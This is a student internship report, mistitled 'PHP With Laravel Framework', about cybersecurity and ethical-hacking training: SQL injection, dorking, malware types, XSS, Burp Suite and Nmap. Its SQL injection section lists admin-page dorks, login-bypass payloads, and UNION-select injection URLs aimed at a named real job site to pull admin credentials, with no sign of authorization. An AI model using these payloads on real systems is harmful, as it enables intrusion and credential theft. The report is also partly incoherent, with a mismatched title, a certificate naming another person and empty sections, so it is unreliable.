Professional Documents
Culture Documents
Internship Report
On
PHP With Laravel Framework
Submitted By
Tahmidul Jawad
ID - 41200101486
Submitted To
Muhammed Samsuddoha Alam
Associate Professor and Co-ordinator
Department of CSE
Dear Sir,
I am pleased to submit the enclosed report titled " PHP With Laravel Framework” in
accordance with our discussion on the importance of understanding the evolving
cybersecurity landscape. This report aims to provide an in-depth analysis of the current
cybersecurity threat landscape and offers insights into the emerging trends, potential
risks, and effective mitigation strategies that organizations should consider. It presents
a comprehensive overview of the key threats impacting businesses and individuals in
today's digital landscape.
I also want to thank you for your support and patience with me and I appreciate the
opportunity provided by you by assigning me to work on this thoughtful Company. I,
therefore pray request, and hope that you would be kind enough to me by providing
acceptance of this report and oblige thereby.
Yours sincerely,
Tahmidul Jawad
ID: 41200101486
Program: CSE (Day)
Northern University Bangladesh
2
APPROVAL
Board of Examiners:
Md. Raihan-ul-Masood
Associate Professor & Head
Department of Computer Science & Engineering
Northern University Bangladesh, Dhaka-1230
3
STUDENT’S DECLARATION
Tahmidul Jawad
ID: CSE 41200101486
Northern University Bangladesh
4
Certificate of Supervisor
I am pleased to state that Tahmidul Jawad worked hard in preparing this report
and he has been able to present a good picture of the concerned organization.
__________________________
Muhammed Samsuddoha Alam
Associate Professor and Co-ordinator
Department of Computer science and engineering
Northern University Bangladesh, Dhaka 1230
5
ACKNOWLEDGEMENTS
I would like to express my sincere gratitude to all the individuals and the entire
team at Arena Web Security for their invaluable support and guidance
throughout my internship on the topic of "Cyber Security and Ethical Hacking."
Their expertise, mentorship, and dedication have played a crucial role in shaping
my learning experience and professional growth.
Thank you all for your invaluable contributions and for providing me with a
remarkable internship experience.
6
Completion Certificate
CERTIFICATE
OF APPRECIATION
THIS CERTIFICATE IS AWARDED TO
MD ABU BATEN
In recognition of the successful completing of the Cyber Security
TANJIM AL FAHIM
CEO
17-06-2021 V-A31W21001S
Issued Verification No.
Training Objective:
Æ Importance of information Security in today’s world.
Æ Elements of security
Æ Various phase of the hacking cycle
Æ Types of hacker attacks
Æ Hacktivism
Æ Ethical hacking
Æ Vulnerability research and tools
Æ Steps for conducting ethical hacking
Æ Computer crimes and implications
7
Table of Contents
Preliminary Pages
Table of Contents
Training Objective: ............................................................................................................. 7
Course Outline:- ................................................................................................................. 9
Introduction ..................................................................................................................... 10
1. What is Sql injection attack? ........................................................................................... 11
2. WAF Bypass .................................................................................................................... 14
2.1WAF Misconfiguration: ........................................................................................................................ 14
2.2Input Transformation Techniques: ........................................................................................................ 15
2.3 Protocol-Level Bypasses: ...................................................................................................................... 15
2.4 Timing Attacks: ..................................................................................................................................... 15
Example of the WAF Bypass:- ................................................................................................. 15
3. Dorking ............................................................................................................................ 16
4. Malware ........................................................................................................................... 17
4.1 Virus: .................................................................................................................................................... 17
4.2 Worm: .................................................................................................................................................. 17
4.3 Trojan: ................................................................................................................................................. 17
4.4 Keylogger: ............................................................................................................................................ 17
4.5 Spyware: ............................................................................................................................................... 17
5. Cross Site Scripting (XSS) ............................................................................................... 18
5.1 Stored XSS: ........................................................................................................................................... 18
5.2Reflected XSS: ...................................................................................................................................... 18
5.3 DOM-based XSS: .................................................................................................................................. 19
6. Burpsuite ......................................................................................................................... 19
7. Scanning .......................................................................................................................... 21
7.1 Nmap: .................................................................................................................................................... 21
7.2 FIN Scan: .............................................................................................................................................. 21
7.3 XMAS Scan: ......................................................................................................................................... 21
7.4 TCP Scan: .............................................................................................................................................. 22
7.5 UDP Scan: ............................................................................................................................................. 22
7.6 IDLE Scan: ............................................................................................................................................ 22
8. Penetration Testing .......................................................................................................... 22
8.1 What is penetration testing? ...................................................................................................... 22
8.2 Why conduct a penetration testing? .................................................................................................. 23
8.3 What can be tested? ............................................................................................................................ 23
8.4 What is a process of penetration testing? .................................................................................. 23
CONCLUSION ................................................................................................................ 24
Reason for choosing CEH ................................................................................................ 25
8
Course Outline:-
Total Credit 50
Æ Introduction to Ethical Hacking
Æ Foot printing
Æ Open-Source Intelligence (OSINT)
Æ Dorking
Æ Cryptography
Æ Denial-of-Service (DDOS)
Æ Trojans and Backdoors
Æ SQL Injection
Æ WAF Bypass
Æ Shell Scripting
Æ Keylogger, Spyware
Æ Hacking Wireless Networks
Æ Web Server Security, cPanel
Æ LFI/RFI/RCE (Paper)
Æ Cross Site Scripting (XSS)
Æ Social Engineering, Phishing, Social Media Recovery
Æ Linux (Kali Linux) Hacking Tools
Æ Burpsuite, Hacking Lab
Æ System Hacking, Authentication Bypass
Æ Portswigger lab problem solve
Æ NMAP, FIN scan, XMAS scan, TCP scan, UDP scan, IDLE scan
Æ Outsourcing in Hackerone and Bugcroud
Æ Bug Report
Æ Penetration Testing
Æ Thesis(paper writing)
Æ Internship(30 days)
9
Introduction
This internship report provides an overview of my practical experience and learning
during my internship in the field of cybersecurity and ethical hacking. Throughout this
internship, I had the opportunity to delve into the fascinating world of cybersecurity,
gaining hands-on experience in various aspects of securing digital systems and
understanding the ethical principles underlying hacking techniques.
Cybersecurity has become a critical concern in today's digital age, with organizations
and individuals facing increasingly sophisticated threats from malicious actors. As a
result, there is a growing demand for skilled professionals who can protect against and
mitigate cyber risks. This internship aimed to provide me with practical exposure to
the challenges and techniques involved in securing computer networks, systems, and
data.The objectives of this internship report are to document the activities and projects
I undertook, highlight the skills I developed, and reflect on the ethical implications of
my work. It covers a wide range of topics, including vulnerability assessment,
penetration testing, incident response, and security best practices. Throughout my
internship, I had the privilege of working alongside experienced cybersecurity
professionals who guided me through real-world scenarios and provided valuable
mentorship. I actively participated in security assessments, analyzed vulnerabilities,
and recommended appropriate countermeasures to enhance the security posture of the
organizations I worked with.
Ethical hacking, an integral part of this internship, allowed me to explore the mindset
of an attacker and understand how vulnerabilities can be exploited. I learned about
various hacking techniques, such as reconnaissance, scanning, exploitation, and post-
exploitation, always adhering to the ethical guidelines and legal boundaries in
place.Moreover, this internship provided me with a deeper understanding of the
importance of proactive security measures, including continuous monitoring, threat
intelligence, and risk assessment. I gained exposure to industry-standard tools and
frameworks used for security testing and analysis, equipping me with the necessary
technical skills to identify and mitigate vulnerabilities.
10
1. What is Sql injection attack?
A SOL Injection attack is a form of attack that comes from user input that has
not been checked to see that it is valid. The objective is to fool the database
system into running malicious code that will reveal sensitive information or
otherwise compromise the server.
SQL injection is a technique used to take advantage of non-validated input
vulnerabilities to pass SQL commands through a Web application for execution
by a backend database. Attackers take advantage of the fact that programmers
often chain together SQL commands with user-provided parameters, and can
therefore embed SOL commands inside these parameters. The result is that the
attacker can execute arbitrary SQL queries and/or commands on the backend
database server through the Web application.
MYSQL Injection
Dorks Code:
inurl:admin.asp
inurl:login/admin.asp
inurl:admin/login.asp
inurladmin/login.asp
inurl:admin/home.asp
inurladmin/login.asp
inurl:administrator login.asp
I am going to use:
Code:
http://site.com/Admin Login.asp
Logging
Now you can find some site over these dorks and try to log in with:
Username: Admin
Code:
'or'1'='1
‘ or ‘1'='1
11
‘ or 0=0 --
" or 0=0 –
or 0=0 =-
‘ or 0=0 #
' or '×'='x
" or "x"="×
" or 1=1--
" or 1=1—
or 1=1—
or a=a--
"or "a"="a
"or'1=1'
Password' or 1=1 will the confuse server and will let you log in.
So if you are able to log in, site is vulnerable and you are going to be able to
use admin panel.
Advance Sql Injection:
◦ http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98
union select1,2,group_concat(database0),4,5,6,7,8,9,10, 11, 12,13, 14, 15,
16, 17, 18, 19,20,21,22,23,24,25,26,27,28,29,30,31-
◦ http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98
union select1,2, group_concat(table _name),4,5,6,7,8,9, 10,11,12,13, 14,
15,16, 17,18, 19,20,21,22,23,24, 25,26,27,28,29,30,31 from information
schema.tables where table schema = database() -
◦ http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98
union select 1,2, group_concat(column_name), 4,5,6, 7,8,9,10,11, 12, 13,
14, 15, 16,17,18,19,20,21,22,23, 24,25,26,27,28,29,30,31 from information
schema.columns where table name = 0x6e675£61646d696e__
12
Æ http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98
union select 1,2,group_ concat(id, 0×3a, lo ginid, 0x3 a,
mail,0×3a,password,0x3a,name,0×3a,type,0×3a),
4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,
19,20,21,22,23,24,25,26,27,28,29,30,31 from ng admin—
Menual Sql Injection:-
Ø Havij
Ø Sql map
Havij Example:-
13
2. WAF Bypass
14
2.2 Input Transformation Techniques:
WAFs analyze and filter incoming requests based on predefined patterns or signatures.
Attackers can employ input transformation techniques to obfuscate malicious payloads
and evade detection. For example, encoding or encrypting malicious code can make it
difficult for the WAF to recognize and block the malicious intent.
It's important to highlight that bypassing a WAF is unethical and illegal without proper
authorization. WAFs play a crucial role in protecting web applications from various
attacks, and bypassing them can lead to serious security implications, data breaches,
and legal consequences. Responsible security practitioners should focus on
collaborating with system administrators and WAF providers to enhance the
effectiveness of these security measures.
15
3. Dorking
In the context of computer security and hacking, dorking refers to a technique
where individuals use search engines, such as Google, to find vulnerable
websites and servers. The process involves using specific search queries or
"dorks" that are designed to reveal websites or web applications with known
vulnerabilities or misconfigurations.
By using dorks, attackers can identify websites that may have exposed sensitive
information, weak passwords, or outdated software versions that are susceptible
to exploitation. Dorking can be an initial step in the reconnaissance phase of a
cyber attack, providing hackers with potential targets for further exploitation.
It's important to note that dorking itself is not malicious; it is a method used by
both security researchers and malicious actors to find vulnerabilities. Ethical
hackers and cybersecurity professionals may employ dorking techniques to
discover and address vulnerabilities before they are exploited by malicious
attackers. However, unauthorized and malicious use of dorking techniques to
compromise systems or access sensitive information is illegal and a violation of
computer security laws.
Example:
inurl /bug bounty
inurl : / security
inurl:security.txt
inurl:security "reward"
inurl : /responsible disclosure
inurl : /responsible-disclosure/ reward
inurl : / responsible-disclosure/ swag
inurl : / responsible-disclosure/ bounty
16
4. Malware
This is a big catchall phrase that covers all sorts of software with nasty intent.
Not buggy software, not programs you don't like, but software which is
specifically written with the intent to harm.
4.1 Virus:
This is a specific type of malware that spreads itself once it's initially run. It's
different from other types of malware because it can either be like a parasite that
attaches to good files on your machine, or it can be self-contained and search out
other machines to infect.
4.2 Worm:
Think of inchworms rather than tapeworms. These are not parasitic worms, but
the kind that move around on their own. In the malware sense, they're viruses
that are self-contained (they don't attach themselves like a parasite and go
around searching out other machines to infect.
4.3 Trojan:
Do you remember that story you had to read in high school about the big
wooden horse that turned out to be full of guys with spears? This is the computer
equivalent. You run a file that is supposed to be something fun or important, but
it turns out that it's neither fun nor important, and it's now doing nasty things to
your machine.
4.4 Keylogger:
A keylogger, also known as keystroke logger, is a type of software or hardware
that records every keystroke made on a computer or mobile device without the
user's knowledge or consent. It can capture sensitive information such as
passwords, credit card details, personal messages, and other confidential data.
Keyloggers can be designed to operate at the software level, intercepting
keystrokes before they reach the operating system, or at the hardware level,
capturing keystrokes through physical devices attached to the computer.
4.5 Spyware:
Spyware is a broader term that refers to any software that secretly gathers
information about a user or organization without their consent. It is typically
installed on a device without the user's knowledge, often bundled with legitimate
software or through malicious downloads. Spyware can monitor and collect
17
various types of information, such as browsing habits, online activities,
passwords, email addresses, and more. This information is then transmitted to a
remote server, where it can be accessed and exploited by malicious individuals
for various purposes, including identity theft, fraud, or targeted advertising.
Both keyloggers and spyware can pose significant privacy and security risks.
They can compromise personal and sensitive information, leading to financial
loss, identity theft, and other forms of cybercrime. Protecting against these
threats involves using robust antivirus and anti-malware software, keeping
software and operating systems up to date, being cautious while downloading
files or visiting suspicious websites, and regularly monitoring for any signs of
unauthorized activity on your devices.
18
5.3 DOM-based XSS:
DOM (Document Object Model)-based XSS occurs when the client-side script
modifies the Document Object Model of a web page, leading to script execution.
Unlike stored and reflected XSS, DOM-based XSS does not require server-side
vulnerabilities. Instead, it exploits insecure JavaScript coding practices that
allow attacker-controlled data to be directly incorporated into the DOM.
The consequences of successful XSS attacks can vary depending on the attacker's
intentions, but they can include the theft of sensitive information, session hijacking,
defacement of websites, distribution of malware, or phishing attacks.
6. Burpsuite
Burp Suite is a popular and powerful set of tools used for web application
security testing and penetration testing. It is developed by PortSwigger, and it
provides a comprehensive platform for assessing the security of web
applications. Burp Suite consists of several modules that work together to assist
security professionals in various stages of the testing process.
19
The main features of Burp Suite include:
Intercepting Proxy:
Burp Suite acts as a proxy between the browser and the web application,
allowing users to intercept and modify the requests and responses. This feature
helps in analyzing and manipulating the data exchanged between the client and
the server, making it useful for identifying and exploiting vulnerabilities.
Spider:
The Spider tool automatically explores the target web application, crawling
through the different pages and identifying all the accessible functionality. It
helps in mapping out the application's structure and discovering hidden content
and functionality.
Scanner:
20
Burp Suite includes an automated vulnerability scanner that can identify
common web application security issues, such as cross-site scripting (XSS),
SQL injection, and more. The scanner performs various checks and tests against
the target application to identify potential vulnerabilities.
Intruder:
The Intruder tool is used for automated fuzzing and brute-forcing attacks. It
allows testers to define custom payloads and payloads lists to automate attacks
against different parts of the web application, such as parameters, headers, and
cookies. This feature helps in identifying vulnerabilities related to input
validation and security controls.
Repeater:
The Repeater tool allows testers to manually send modified requests to the target
web application and observe the responses. It helps in manually testing
vulnerabilities and verifying the impact of various input values.
7. Scanning
7.1 Nmap:
Nmap (Network Mapper) is a powerful and versatile open-source network
scanning tool used for network exploration, security auditing, and vulnerability
assessment. It provides a wide range of scanning techniques and features that
allow users to discover hosts, services, and potential vulnerabilities within a
network.
21
and FIN flags set, resembling an "XMAS tree" with all the lights on. If a port
responds with a TCP RST packet, it is considered closed. The lack of response
may indicate that the port is open or filtered.
8. Penetration Testing
8.1 What is penetration testing?
22
8.2 Why conduct a penetration testing?
All part where organization captures, store and processes information can be assessed
like the system where the information is stored in, the transmission channels that
transport it, and the processes and personnel that manages it, Examples of areas that
are commonly tested are:
Penetration testing has a vulnerability assessment part also. In pen test we launch attack
and in VA (vulnerability assessment) we only test for vulnerability by automated VA tools
like Niko, nessus, acunetix etc. Steps of advanced penetration testing:
23
CONCLUSION
24
Reason for choosing CEH
1. Companies started taking Information Security seriously.
2. Salary is good.
3. The field is diverse.
4. I will never be unemployed.
5. I have an opportunity to interact with everyone in the company.
6. I will set the rules (and also have the power to break them).
7. Being a security professional is cool... or at least people think it is.
25